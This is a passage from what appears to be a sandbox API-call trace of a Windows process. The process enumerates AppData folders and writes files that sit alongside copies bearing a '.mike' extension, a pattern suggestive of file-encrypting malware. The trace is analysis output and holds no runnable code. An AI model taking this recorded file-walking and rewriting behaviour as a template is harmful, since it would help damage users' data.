lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0", lpFilePart=0x0) returned 0x3b [0158.054] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.054] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.mike", lpFilePart=0x0) returned 0x4c [0158.055] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD", lpFilePart=0x0) returned 0x47 [0158.058] WriteFile (in: hFile=0x1c8, lpBuffer=0x212a474*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x212a474*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0158.059] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.mike", lpFilePart=0x0) returned 0x4c [0158.059] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.mike", lpFilePart=0x0) returned 0x4c [0158.059] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD", dwFileAttributes=0x80) returned 1 [0158.063] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0158.063] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.mike", lpFilePart=0x0) returned 0x4c [0158.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML", lpFilePart=0x0) returned 0x47 [0158.069] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.mike", lpFilePart=0x0) returned 0x4c [0158.070] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.mike", lpFilePart=0x0) returned 0x4c [0158.070] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML", dwFileAttributes=0x80) returned 1 [0158.073] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.073] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.073] CoTaskMemFree (pv=0x508980) [0158.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.074] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x38 [0158.075] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.075] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.075] CoTaskMemFree (pv=0x508980) [0158.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.076] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpFilePart=0x0) returned 0x40 [0158.076] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.076] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.076] CoTaskMemFree (pv=0x508980) [0158.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.078] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0158.078] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.078] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.078] CoTaskMemFree (pv=0x508980) [0158.082] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.082] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.082] CoTaskMemFree (pv=0x508980) [0158.082] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.083] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.084] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0158.084] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0158.084] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.085] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.085] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0158.085] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.085] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.085] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.085] CoTaskMemFree (pv=0x508980) [0158.086] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.086] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.087] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0158.087] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 0 [0158.087] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.087] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.088] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0158.088] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.088] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.088] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.088] CoTaskMemFree (pv=0x508980) [0158.089] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.089] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.089] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0158.090] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0158.090] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0158.090] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.090] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.091] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0158.091] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0158.091] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.091] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.091] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.091] CoTaskMemFree (pv=0x508980) [0158.092] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.092] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.094] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0158.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0158.095] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.095] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.096] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.096] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x0, dwReserved1=0x0, 